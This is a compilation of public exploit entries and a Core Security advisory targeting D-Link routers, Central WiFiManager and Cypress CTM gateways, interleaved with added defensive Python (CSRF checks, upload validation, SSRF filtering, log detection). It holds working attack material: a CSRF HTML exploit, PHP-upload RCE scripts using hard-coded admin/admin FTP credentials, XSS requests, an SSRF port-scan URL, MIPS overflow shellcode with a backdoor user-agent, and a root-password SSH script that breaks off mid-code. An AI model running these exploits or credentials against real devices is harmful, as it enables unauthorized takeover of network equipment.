source: https://www.securityfocus.com/bid/51985/info
D-Link DAP-1150 is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.
D-Link DAP-1150 firmware version 1.2.94 is vulnerable; other versions may also be affected.
<html>
<head>
<title>Exploit for D-Link DAP 1150. Made by MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="StartCSRF()">
<script>
function StartCSRF() {
for (var i=1;i<=3;i++) {
var ifr = document.createElement("iframe");
ifr.setAttribute('name', 'csrf'+i);
ifr.setAttribute('width', '0');
ifr.setAttribute('height', '0');
document.body.appendChild(ifr);
}
CSRF1();
setTimeout(CSRF2,1000);
setTimeout(CSRF3,2000);
}
function CSRF1() {
window.frames["csrf3"].document.body.innerHTML = '<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
type="hidden" name="res_json" value="y">\n<input type="hidden"
name="res_data_type" value="json">\n<input type="hidden"
name="res_config_action" value="3">\n<input type="hidden"
name="res_config_id" value="7">\n<input type="hidden" name="res_struct_size"
value="0">\n<input type="hidden" name="res_buf"
value="{%22manual%22:true,%20%22ifname%22:%22%22,%20%22servers%22:%2250.50.50.50%22,%20%22defroute%22:true}">\n</form>';
window.frames["csrf3"].document.hack.submit();
}
function CSRF2() {
window.frames["csrf4"].document.body.innerHTML = '<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="res_cmd" value="20">\n<input type="hidden" name="res_buf"
value="null">\n<input type="hidden" name="res_cmd_type" value="bl">\n<input
type="hidden" name="v2" value="y">\n<input type="hidden" name="rq"
value="y">\n</form>';
window.frames["csrf4"].document.hack.submit();
}
function CSRF3() {
window.frames["csrf2"].document.body.innerHTML = '<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
type="hidden" name="res_config_action" value="3">\n<input type="hidden"
name="res_config_id" value="69">\n<input type="hidden"
name="res_struct_size" value="1">\n<input type="hidden" name="res_buf"
value="password|">\n</form>';
window.frames["csrf2"].document.hack.submit();
}
</script>
</body>
</html>
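The PoC above works only because the device acts on configuration changes arriving as plain GET requests with no proof that they came from its own management page. As an added, defender-side example (not part of the SecurityFocus entry and not the device's own code), the following Python shows the two checks a management interface can apply before acting on a request: a same-origin test on Origin/Referer and a session-bound synchronizer token compared in constant time. The device origin, the dict-based session store and the request shape are assumptions for the example; the sample requests are constructed.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed management origin for this example (the DAP-1150 entry names none).
DEVICE_ORIGIN = "http://192.168.0.50"


def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the session; the UI embeds it in its forms."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token


def same_origin(headers: dict) -> bool:
    """True only if Origin, or failing that Referer, names the device itself.
    A request carrying neither header is treated as cross-site."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == DEVICE_ORIGIN


def is_csrf_safe(method: str, headers: dict, params: dict, session: dict) -> bool:
    """Decide whether a configuration request may be acted on.

    All three conditions are required:
      1. state changes only via POST, so a hidden-form GET like the PoC's is refused;
      2. the request is same-origin;
      3. the submitted token equals the session-bound one (constant-time compare).
    """
    if method.upper() != "POST":
        return False
    if not same_origin(headers):
        return False
    expected = session.get("csrf_token")
    supplied = params.get("csrf_token", "")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)


if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    # Constructed request shaped like the PoC's hidden-form submission: cross-site GET, no token.
    forged = {"res_config_action": "3", "res_config_id": "69", "res_buf": "password|"}
    print("forged request accepted:",
          is_csrf_safe("GET", {"Referer": "http://other.example/"}, forged, session))
    legit = {"csrf_token": token, "res_config_action": "3"}
    print("legitimate request accepted:",
          is_csrf_safe("POST", {"Origin": DEVICE_ORIGIN}, legit, session))
```

The Origin comparison is an exact string match, so a deployment that serves the UI on a non-default port must include the port in `DEVICE_ORIGIN`; the token check alone already defeats the PoC, the origin check is defence in depth for browsers that omit Referer.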
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
D-Link Central WiFiManager Software Controller Multiple Vulnerabilities
1. *Advisory Information*
Title: D-Link Central WiFiManager Software Controller Multiple
Vulnerabilities
Advisory ID: CORE-2018-0010
Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities
Date published: 2018-10-04
Date of last update: 2018-10-04
Vendors contacted: D-Link
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Unrestricted Upload of File with Dangerous Type [CWE-434],
Improper Authorization [CWE-285], Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper
Neutralization of Input During Web Page Generation
('Cross-site Scripting') [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441
3. *Vulnerability Description*
D-Link's website states that:
[1] Central WiFiManager Software Controller helps network administrators
streamline their wireless access point (AP) management workflow. Central
WiFiManager is an innovative approach to the more traditional
hardware-based multiple access point management system. It uses a
centralized server to both remotely manage and monitor wireless APs on a
network.
Vulnerabilities were found in the Central WiFiManager Software
Controller, allowing unauthenticated and authenticated file upload with
dangerous type that could lead to remote code execution with system
permissions. Also, two stored Cross Site Scripting vulnerabilities were
found.
4. *Vulnerable Packages*
. Central WifiManager v1.03
Other products and versions might be affected, but they were not tested.
5. *Vendor Information, Solutions and Workarounds*
D-Link released the following Beta version that addresses the reported vulnerabilities:
. Central WifiManager v 1.03r0100-Beta1
In addition, D-Link published a security note in:
https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092
6. *Credits*
These vulnerabilities were discovered and researched by Julian Muñoz
from Core Security Consulting Services. The publication of this advisory
was coordinated by Leandro Cuozzo from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
D-Link Central WiFiManager Software Controller exposes an FTP server
that listens by default on port 9000 and has hard-coded credentials
(admin, admin). Taking advantage of this fact, we upload a PHP file into
the '/web/public' directory and then, by requesting this file, are able
to execute arbitrary code on the target system (shown in 7.1).
In 7.2 we show a similar attack, but in this case with an authenticated
user in the web application. The application has a function to upload a
.rar file used for the captive portal displayed by the Access Points. We
craft a .rar containing a PHP file that ends up executing in the context
of the web application. When the .rar is uploaded, it is stored under
the path "\web\captivalportal" in a folder named with a timestamp
produced by the PHP time() function. To learn the web server's time we
request an information file that contains it. Once we have the server's
time we upload the .rar, calculate the corresponding epoch and request
the expected path, incrementing the epoch by one until we hit the
correct one.
Finally, we discovered two Cross-Site Scripting vulnerabilities: one in
the update site functionality, in the 'sitename' parameter (7.3), and
the other in the creation of a local user, in the 'username' parameter
(7.4).
7.1. *Unauthenticated Remote Code Execution by Unrestricted Upload of
File with Dangerous Type*
[CVE-2018-17440] The web application starts an FTP server running on
port 9000 by default with admin/admin credentials and does not offer an
option to change them, so in this PoC we establish a connection with the
server and upload a PHP file. Since the application does not prevent
unauthenticated users from requesting any file in the web root, we then
request the uploaded file to achieve remote code execution.
/-----
import requests
from ftplib import FTP
#establish connection with FTP server
host_ip = "127.0.0.1"
ftp = FTP()
ftp.connect(host=host_ip, port=9000)
ftp.login("admin", "admin")
data = []
#create PHP poc file
poc_php_file = open("poc.php", "w+")
poc_php_file.write("<?php\nsystem('whoami');\n?>")
poc_php_file.close()
#upload PHP poc file
php_file = open("poc.php", "rb")
ftp.cwd('/web/public')
ftp.storbinary("STOR write_file.php", php_file)
ftp.dir(data.append)
ftp.quit()
for line in data:
    print "-", line
session = requests.Session()
session.trust_env = False
#get the uploaded file for remote code execution
get_uploaded_file = session.get('https://127.0.0.1/public/write_file.php', verify=False)
print get_uploaded_file.text
-----/
7.2. *Authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type*
[CVE-2018-17442] In this case we upload a file through the
onUploadLogPic endpoint, which takes a .rar file, decompresses it and
stores it in a folder named after the value of the PHP time() function.
Our goal is first to obtain the server's time, then upload a .rar
containing our PHP file, calculate the corresponding epoch and iterate,
incrementing it until we hit the right one and remote code execution is
achieved.
/-----
import re
import time
import requests
import datetime
import tarfile
def parse_to_datetime(date_string):
    date_list = date_string.split("-")
    td = date_list[2][2:].split(":")
    return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]), int(td[1]), int(td[2]))
session = requests.Session()
session.trust_env = False
php_session_id = "96sml0e9soke02k6d672oumqq4" #example (insert here the proper session id)
cookie = {'PHPSESSID': php_session_id}
#create tar file to upload.
poc_php_file = open("poc.php", "w+")
poc_php_file.write("<?php\nsystem('whoami');\n?>")
poc_php_file.close()
poc_tar_file = tarfile.open("poc_tar_file.tar", mode="w")
poc_tar_file.add("poc.php")
poc_tar_file.close()
#get server datetime.
get_server_time_from_requested_file = session.get('https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT',
                                                  cookies=cookie, verify=False)
date = re.search("Date(.*)\d", get_server_time_from_requested_file.text).group().replace('DateTime ', '')
#generate epoch from server's date
epoch = int(time.mktime(parse_to_datetime(date).timetuple()))
#upload attack PHP file.
attack_tar_file = "poc_tar_file.tar"
tar_file = {'stylename': 'attack', 'logfile': open(attack_tar_file, 'rb')}
restore_backup_response = session.post('https://127.0.0.1/index.php/Config/onUploadLogPic',
                                       files=tar_file,
                                       cookies=cookie, verify=False)
for i in range(0,20):
    #get the uploaded file named after time epoch, returned by PHP time() function.
    filename = str(epoch) + "/" + "poc.php"
    get_uploaded_file = session.get('https://127.0.0.1/captivalportal/%s' %filename, verify=False)
    if get_uploaded_file.status_code == 200:
        print "Remote Code Execution Achieved"
        print get_uploaded_file.text
        break
    epoch += 1
-----/
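Both 7.1 and 7.2 come down to the same defect: an uploaded file or archive lands in a directory the web server executes from, nothing checks what it contains, and in 7.2 the destination name is predictable. As an added example (not Core Security's code and not D-Link's; the allowed-extension list and the storage layout are assumptions), the following Python shows the checks a captive-portal upload handler should apply: refuse server-executable and non-regular archive members, refuse path escapes, and store the result under a random folder name instead of time(). The sample archives are constructed in the block.

```python
import io
import os
import posixpath
import secrets
import tarfile
import tempfile

# Assumption: a captive-portal theme only ever needs static assets.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".css", ".html", ".js"}


class UnsafeArchive(ValueError):
    """Raised on the first member that must not be written under the web root."""


def validate_members(archive: tarfile.TarFile) -> list:
    """Return the names of acceptable members; raise UnsafeArchive otherwise.

    Rejects: absolute paths and '..' escapes, anything that is not a plain file
    or directory (symlinks, devices), and any file whose extension is not on
    the static-asset allow list, so a poc.php can never land in the web root.
    """
    accepted = []
    for member in archive.getmembers():
        name = member.name
        norm = posixpath.normpath(name)
        if name.startswith("/") or norm == ".." or norm.startswith("../"):
            raise UnsafeArchive(f"path escapes the upload folder: {name}")
        if not (member.isfile() or member.isdir()):
            raise UnsafeArchive(f"non-regular member refused: {name}")
        if member.isfile():
            ext = posixpath.splitext(name)[1].lower()
            if ext not in ALLOWED_EXTENSIONS:
                raise UnsafeArchive(f"disallowed file type: {name}")
        accepted.append(name)
    return accepted


def check_upload(data: bytes) -> list:
    """Validate archive bytes without writing anything; returns accepted member names."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as archive:
        return validate_members(archive)


def is_safe_upload(data: bytes) -> bool:
    try:
        check_upload(data)
        return True
    except UnsafeArchive:
        return False


def store_captive_portal_upload(data: bytes, base_dir: str) -> str:
    """Validate, then extract into a folder whose name cannot be predicted."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as archive:
        validate_members(archive)
        folder = os.path.join(base_dir, secrets.token_hex(16))
        os.makedirs(folder, exist_ok=False)
        try:
            archive.extractall(folder, filter="data")  # tarfile with extraction filters
        except TypeError:                                # older tarfile: no filter argument
            archive.extractall(folder)
    return folder


def build_tar(files: dict) -> bytes:
    """Constructed sample archive for testing: {member name: content} -> tar bytes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


if __name__ == "__main__":
    theme = build_tar({"logo.png": b"\x89PNG\r\n", "style/portal.css": b"body{}"})
    with tempfile.TemporaryDirectory() as base:
        print("stored under", store_captive_portal_upload(theme, base))
    try:
        check_upload(build_tar({"poc.php": b"<?php echo 1; ?>"}))
    except UnsafeArchive as exc:
        print("refused:", exc)
```

The extension allow list is deliberately the only way in: a deny list of ".php" variants misses ".phtml", ".phar" and whatever the server's handler map adds later. The random folder name does not replace the content check, it only removes the guessable path that 7.2 iterates over.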
7.3. *Cross-Site Scripting in the application site name parameter*
[CVE-2018-17443] The 'sitename' parameter of the UpdateSite endpoint is
vulnerable to stored Cross-Site Scripting.
The following is a proof of concept to demonstrate the vulnerability:
/-----
POST /index.php/Config/UpdateSite HTTP/1.1
Host: 10.2.45.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.2.45.220/index.php/Config/CreatSite
Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
siteid=0&sitename=<script>alert(1)</script>&sitenamehid=fakesitename&UserMember%5B%5D=1
-----/
7.4. *Cross-Site Scripting in the creation of a new user*
[CVE-2018-17441] The 'username' parameter of the addUser endpoint is
vulnerable to stored Cross-Site Scripting.
The following is a proof of concept to demonstrate the vulnerability:
/-----
POST /index.php/System/addUser HTTP/1.1
Host: 10.2.45.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.2.45.220/index.php/System/userManager
Content-Type: application/x-www-form-urlencoded;
Content-Length: 96
Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
Connection: close
username=<script>alert(1)</script>&userpassword=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change&
-----/
8. *Report Timeline*
2018-06-04: Core Security sent an initial notification to D-Link,
including a draft advisory.
2018-06-06: D-Link confirmed receipt of the advisory and informed Core
Security that they would have an initial response on 06/08.
2018-06-08: D-Link informed that they would provide a schedule for the
fixes on 06/13.
2018-06-08: Core Security thanked D-Link for the update.
2018-06-14: D-Link informed its plan of remediation and notified Core
Security that the fixed version will be available on 08/31.
2018-06-15: Core Security thanked D-Link for the update and proposed to
keep in regular contact until this tentative release date.
2018-07-23: Core Security requested a status update.
2018-07-25: D-Link answered saying that they are still targeting 08/31
as the release date.
2018-08-24: Core Security requested a new status update and a solidified
release date for the fixed version.
2018-08-28: D-Link sent a beta version for test.
2018-08-30: Core Security tested the beta version and requested D-Link
to coordinate a release date.
2018-09-21: D-Link informed that they were planning a security
announcement and they were ready to schedule a disclosure date.
2018-09-24: Core Security thanked the update and proposed October 4th as
the publication date.
2018-10-04: Advisory CORE-2018-0010 published.
9. *References*
[1] http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/.
10. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies. We conduct our research in several important areas of
computer security including system vulnerabilities, cyber attack
planning and simulation, source code auditing, and cryptography. Our
results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security*
Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The
company's threat-aware, identity & access, network security, and
vulnerability management solutions provide actionable insight and
context needed to manage security risks across the enterprise. This
shared insight gives customers a comprehensive view of their security
posture to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if
a breach does occur.
Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com
12. *Disclaimer*
The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
# Exploit Title: D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery
# Author: John Page (aka hyp3rlinx)
# Date: 2018-11-09
# Vendor: http://us.dlink.com
# Product Link: http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/
# Version: Version 1.03 r0098
# CVE: N/A
# References:
# [Security Issue]
# Using a web browser or a script, SSRF can be initiated against internal/external systems
# to conduct port scans by leveraging D-Link's MailConnect component.
# The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended
# to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address,
# leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI.
# This can undermine accountability of where scans or connections actually came from and/or bypass
# the firewall. This can be automated via script or using a web browser.
# [Exploit/POC]
https://VICTIM-IP/index.php/System/MailConnect/host/port/secure/
reply: OK
#Scan internal port 22 SSH:
https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/
reply: OK
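The MailConnect defect is a missing decision about which destinations a server-side connectivity test may reach. As an added example (not D-Link's code and not the exploit author's), the Python below shows the validation a mail-connectivity check should perform before opening a socket: restrict the port to SMTP ports, resolve the name, refuse any address that is not globally routable (loopback, link-local, RFC 1918, so the 127.0.0.1:22 probe above is rejected), and then connect to the validated address rather than to the name. The allowed-port set and the injectable resolver are assumptions; the demo resolver table and addresses are constructed, with 8.8.8.8 standing in for any public mail host.

```python
import ipaddress
import socket

# Assumption: a mail-connectivity test only needs the standard SMTP ports.
ALLOWED_MAIL_PORTS = {25, 465, 587}


def is_literal_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def address_is_global(ip: str) -> bool:
    """True only for globally routable unicast addresses.

    Loopback, link-local (including 169.254.169.254), RFC 1918/ULA, multicast
    and reserved ranges are refused. ipaddress also treats the RFC 5737
    documentation ranges (e.g. 203.0.113.0/24) as non-global.
    """
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_global and not addr.is_multicast


def default_resolver(host: str) -> list:
    """All A/AAAA answers for host; every one of them must pass, not just the first."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def check_mail_target(host: str, port: int, resolver=default_resolver) -> tuple:
    """Return (allowed, reason, addresses). Connect to one of the returned
    addresses, never to the name, or DNS rebinding re-opens the hole."""
    if port not in ALLOWED_MAIL_PORTS:
        return False, f"port {port} is not an SMTP port", []
    try:
        addresses = [host] if is_literal_ip(host) else resolver(host)
    except OSError as exc:
        return False, f"cannot resolve {host}: {exc}", []
    if not addresses:
        return False, f"{host} resolves to no address", []
    for ip in addresses:
        if not address_is_global(ip):
            return False, f"{host} resolves to non-global address {ip}", []
    return True, "ok", addresses


def mail_connect(host: str, port: int, timeout: float = 5.0, resolver=default_resolver) -> str:
    """Hardened equivalent of the MailConnect check: validate, then connect by address."""
    allowed, reason, addresses = check_mail_target(host, port, resolver)
    if not allowed:
        return f"REFUSED: {reason}"
    with socket.create_connection((addresses[0], port), timeout=timeout):
        return "OK"


if __name__ == "__main__":
    # Constructed resolver table so the demo needs no network.
    fake_dns = {"smtp.example": ["8.8.8.8"], "imds.internal": ["169.254.169.254"]}
    for host, port in [("127.0.0.1", 22), ("10.0.0.5", 587), ("imds.internal", 25), ("smtp.example", 587)]:
        print(host, port, check_mail_target(host, port, resolver=lambda h: fake_dns[h])[:2])
```

Two details matter in practice: every resolved address is checked, because an attacker-controlled name can return one public and one internal answer, and the check and the connect use the same resolved address. A feature like this should also require the caller to be an authenticated administrator and rate-limit probes, which the block does not model.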
source: https://www.securityfocus.com/bid/63234/info
Multiple Vendors are prone to a stack-based buffer-overflow vulnerability.
Exploiting this vulnerability may allow attackers to execute arbitrary code in the context of the affected devices.
The following are vulnerable:
D-Link DIR-120
D-Link DI-624S
D-Link DI-524UP
D-Link DI-604S
D-Link DI-604UP
D-Link DI-604
D-Link DIR-100
D-Link TM-G5240
PLANEX COMMUNICATIONS BRL-04UR
PLANEX COMMUNICATIONS BRL-04R
PLANEX COMMUNICATIONS BRL-04CW
import sys
import urllib2
try:
    url = 'http://%s/Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=' % sys.argv[1]
except Exception, e:
    print str(e)
    print 'Usage: %s <target ip>' % sys.argv[0]
    sys.exit(1)
# This is the actual payload; here it is a simple reboot shellcode.
# This payload size is limited to about 200 bytes, otherwise you'll crash elsewhere in /bin/webs.
payload = "\x3c\x06\x43\x21" # lui a2,0x4321
payload += "\x34\xc6\xfe\xdc" # ori a2,a2,0xfedc
payload += "\x3c\x05\x28\x12" # lui a1,0x2812
payload += "\x34\xa5\x19\x69" # ori a1,a1,0x1969
payload += "\x3c\x04\xfe\xe1" # lui a0,0xfee1
payload += "\x34\x84\xde\xad" # ori a0,a0,0xdead
payload += "\x24\x02\x0f\xf8" # li v0,4088
payload += "\x01\x01\x01\x0c" # syscall 0x40404
# The payload is split up; some of it before the return address on the stack, some after.
# This little snippet skips over the return address during execution.
# It assumes that your shellcode will not be using the $fp or $t9 registers.
move_sp_fp = "\x03\xa0\xf0\x21" # move $fp, $sp
jump_code = "\x27\xd9\x02\xd4" # addiu $t9, $fp, 724
jump_code += "\x03\x21\xf8\x08" # jr $t9
jump_code += "\x27\xE0\xFE\xFE" # addiu $zero, $ra, -0x102
# Stitch together the payload chunk(s) and jump_code snippet
shellcode_p1 = move_sp_fp + payload[0:68] + jump_code + "DD"
if len(shellcode_p1) < 86:
    shellcode_p1 += "D" * (86 - len(shellcode_p1))
    shellcode_p2 = ""
else:
    shellcode_p2 = "DD" + payload[68:]
# Build the overflow buffer, with the return address and shellcode
# libc.so base address and ROP gadget offset for the DIR-100, revA, v1.13
# libc_base = 0x2aaee000
# ret_offset = 0x3243C
buf = shellcode_p1 + "\x2A\xB2\x04\x3C" + shellcode_p2
# Normally only admins can access the tools_misc.xgi page; use the backdoor user-agent to bypass authentication
req = urllib2.Request(url+buf, headers={'User-Agent' : 'xmlset_roodkcableoj28840ybtide'})
urllib2.urlopen(req)
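Beyond patching, the entry gives a defender two strong signals: the authentication-bypass User-Agent string, and a pingIp value that cannot be an IP address. As an added example (not the exploit author's code; the log format and the log lines are constructed), here is a small Python scanner that flags both in combined-format web logs such as a reverse proxy or syslog collector in front of the device would write.

```python
import re
from urllib.parse import parse_qs, urlsplit

# String taken from the exploit above; its presence in any request is a bypass attempt.
BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"
IPV4_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")

# Combined log format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

FINDING_UA = "backdoor user-agent"
FINDING_PING = "non-IP or oversized pingIp value"


def findings_for_line(line: str) -> list:
    """Return the findings for one log line (empty list if nothing is suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable log line"]
    findings = []
    if m.group("ua") == BACKDOOR_UA:
        findings.append(FINDING_UA)
    path = m.group("path")
    if "tools_misc.xgi" in path:
        query = parse_qs(urlsplit(path).query, keep_blank_values=True)
        for key, values in query.items():
            if not key.endswith("pingIp"):
                continue
            for value in values:
                # A legitimate diagnostic ping target is a dotted quad; the
                # overflow buffer is far longer and is not an address at all.
                if value and not IPV4_RE.fullmatch(value):
                    findings.append(FINDING_PING)
                    break
    return findings


def scan(log_text: str) -> list:
    """Return [(line_number, findings)] for every suspicious line in the log text."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        findings = findings_for_line(line)
        if findings:
            hits.append((number, findings))
    return hits


# Constructed sample log: a benign diagnostic ping, an overflow attempt with the
# bypass user-agent, a bypass-UA request to another page, and a benign request.
SAMPLE_LOG = """\
192.168.0.23 - - [10/Oct/2013:12:00:01 +0000] "GET /Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=192.168.0.1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.0.99 - - [10/Oct/2013:12:00:05 +0000] "GET /Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD HTTP/1.1" 200 0 "-" "xmlset_roodkcableoj28840ybtide"
192.168.0.99 - - [10/Oct/2013:12:00:09 +0000] "GET /index.htm HTTP/1.1" 200 2048 "-" "xmlset_roodkcableoj28840ybtide"
192.168.0.10 - - [10/Oct/2013:12:00:12 +0000] "GET /status.htm HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(findings)}")
```

The user-agent match is exact on purpose: the string is a constant in the firmware, so any variation is not the bypass. The pingIp rule catches this exploit and any other attempt to stuff the same parameter, at the cost of also flagging an operator who types a hostname into the ping box.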
# Exploit Title: Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.cypress.bc.ca
#!/usr/bin/env python3
#
#
# Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)
#
#
# Vendor: Cypress Solutions Inc.
# Product web page: https://www.cypress.bc.ca
# Affected version: CTM-ONE (1.3.6-latest)
# CTM-ONE (1.3.1)
# CTM-ONE (1.1.9)
# CTM200 (2.7.1.5659-latest)
# CTM200 (2.0.5.3356-184)
#
# Summary: CTM-200 is the industrial cellular wireless gateway for fixed
# and mobile applications. The CTM-200 is a Linux based platform powered
# by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
# features make the CTM-200 ideal for mobile fleet applications or fixed
# site office and SCADA communications.
#
# CTM-ONE is the industrial LTE cellular wireless gateway for mobile and
# fixed applications. CTM-ONE is your next generation of gateway for fleet
# tracking and fixed sites.
#
# ======================================================================
# CTM-200
# /var/config/passwd:
# -------------------
# root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# nobody:*:65534:65534:nobody:/var:/bin/false
# daemon:*:65534:65534:daemon:/var:/bin/false
#
# /var/config/advanced.ini:
# -------------------------
# 0
# 0
# Chameleon
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
#
#
# CTM-ONE
# /etc/shadow:
# ------------
# admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
# root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
# daemon:*:16009:0:99999:7:::
# bin:*:16009:0:99999:7:::
# sys:*:16009:0:99999:7:::
# ftp:*:16009:0:99999:7:::
# nobody:*:16009:0:99999:7:::
# messagebus:!:16009:0:99999:7:::
# ======================================================================
#
# Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials
# within their Linux distribution image. This weakness can lead to the
# exposure of resources or functionality to unintended actors, providing
# attackers with sensitive information including executing arbitrary code.
#
# Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)
# GNU/Linux 2.6.32.25 (arm4tl)
# lighttpd/1.4.39
# BusyBox v1.24.1
# BusyBox v1.15.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5686
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php
#
#
# 21.09.2021
#
import sys
import paramiko
bnr='''
o ┌─┐┌┬┐┌─┐ ┌─┐ ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬ ┬ o
│ │││││ ┬ ├─┤ ├┬┘│ ││ │ │ └─┐├─┤├┤ │ │
o └─┘┴ ┴└─┘ ┴ ┴ ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o
'''
print(bnr)
if len(sys.argv)<2:
    print('Put an IP.')
    sys.exit()
adrs=sys.argv[1]##
unme='root'#admin#
pwrd='Chameleon'##
rsh=paramiko.SSHClient()
